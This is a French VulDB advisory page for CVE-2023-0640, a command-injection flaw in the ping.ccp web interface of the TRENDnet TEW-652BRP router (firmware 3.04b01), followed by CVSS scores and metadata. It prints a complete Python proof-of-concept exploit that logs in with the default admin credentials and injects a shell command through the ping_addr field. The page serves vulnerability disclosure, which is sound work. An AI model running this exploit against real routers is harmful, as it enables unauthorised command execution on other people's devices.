TRENDnet TEW-652BRP 3.04b01 Web Interface ping.ccp elévation de privilèges

CVSS Score de méta-températureExploit Prix Actuel (≈)Score d'intérêt CTI
7.8$0-$5k0.04

Une vulnérabilité classée critique a été trouvée dans TRENDnet TEW-652BRP 3.04b01. Affecté est une fonction inconnue du fichier ping.ccp du composant Web Interface. La manipulation avec une valeur d'entrée inconnue mène à une vulnérabilité de classe elévation de privilèges.

La vulnerabilité a été publié en 02/02/2023 (non défini). Cette vulnérabilité est identifiée comme CVE-2023-0640. Des details techniques et un publique exploit sont connus.

Un exploit a été developpé en Python. L'exploit est disponible au téléchargment sur vuldb.com. Il est déclaré comme proof-of-concept. Le code utilisé par l'exploit est:

import requests,socket
import re
import time
from urllib.parse import urlencode

username = 'admin'
password = 'admin'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.2'

headers = {'Host': '{}'.format(device_web_ip), 
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 
'Accept-Language': 'en-US,en;q=0.5', 
'Accept-Encoding': 'gzip, deflate', 
'Content-Type': 'application/x-www-form-urlencoded', 
'Origin': 'http://{}'.format(device_web_ip), 
'Connection': 'keep-alive', 
'Referer': 'http://{}/ping_test.htm'.format(device_web_ip), 
'Upgrade-Insecure-Requests': '1'}

login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password)
login_url = 'http://{}/login.ccp'.format(device_web_ip)
r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2)
if r is None or r.status_code != 200:
  print('Login wrong, please retry!')
  exit()

params = {
  'ccp_act': 'ping_v4', 
  'nextPage': 'ping_back.htm', 
  'html_response_page': 'ping_back.htm', 
  'html_response_message': 'The+setting+is+saved.', 
  'html_response_return_page': 'ping_test.htm', 
  'ping_addr': 'abcd"$(ping -c 1 {})"'.format(ping_target_ip), 
  'ping': 'Ping', 
  'deviceList': '', 
  '/friendlyName': ''
  }
method = 'POST'
url = 'http://{}/ping.ccp'.format(device_web_ip)

try:
  r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2)
  r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2)
except:
  pass

Il n'y a aucune information à propos de possibles contremesures connues. Il est suggéré de remplacer l'object infecté par un produit alternatif.

Produitinfo

Fournisseur

Nom

Version

Licence

CPE 2.3info

CPE 2.2info

CVSSv4info

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Vecteur: 🔍
VulDB Fiabilité: 🔍

CVSSv3info

VulDB Score méta-base: 8.1
VulDB Score de méta-température: 7.8

VulDB Note de base: 7.2
VulDB Note temporaire: 6.5
VulDB Vecteur: 🔍
VulDB Fiabilité: 🔍

NVD Note de base: 9.8
NVD Vecteur: 🔍

CNA Note de base: 7.2
CNA Vecteur (VulDB): 🔍

CVSSv2info

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VecteurComplexitéAuthentificationConfidentialitéIntégritéDisponibilité
ouvrirouvrirouvrirouvrirouvrirouvrir
ouvrirouvrirouvrirouvrirouvrirouvrir
ouvrirouvrirouvrirouvrirouvrirouvrir

VulDB Note de base: 🔍
VulDB Note temporaire: 🔍
VulDB Fiabilité: 🔍

NVD Note de base: 🔍

Exploitinginfo

Classe: Elévation de privilèges
CWE: CWE-77 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍

Localement: Non
Remote: Oui

Disponibilité: 🔍
Accéder: Publique
Statut: Proof-of-Concept
Langage de programmation: 🔍
Télécharger: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Prédiction de prix: 🔍
Estimation actuelle des prix: 🔍

0-Dayouvrirouvrirouvrirouvrir
Aujourd'huiouvrirouvrirouvrirouvrir

Renseignements sur les menacesinfo

Intérêt: 🔍
Acteurs actifs: 🔍
Groupes APT actifs: 🔍

Contre-mesuresinfo

Recommandé: aucune mesure d'atténuation connue
Statut: 🔍

Heure 0 jour: 🔍

Chronologieinfo

02/02/2023 🔍
02/02/2023 +0 jours 🔍
02/02/2023 +0 jours 🔍
01/03/2023 +27 jours 🔍

Sourcesinfo

Statut: Non défini

CVE: CVE-2023-0640 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013

Entréeinfo

Établi: 02/02/2023 09:18
Mise à jour: 01/03/2023 17:07
Changements: 02/02/2023 09:18 (39), 02/02/2023 09:19 (2), 01/03/2023 17:01 (2), 01/03/2023 17:07 (28)
Compléter: 🔍
Auteur: leetsun

Submitinfo

Accepté

  • Submit #77217: Command injection on TRENDnet router TEW-652BRP (par leetsun)

Discussion

Aucun commentaire pour l'instant. Langues: fr + en.

Veuillez vous connecter pour commenter.

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!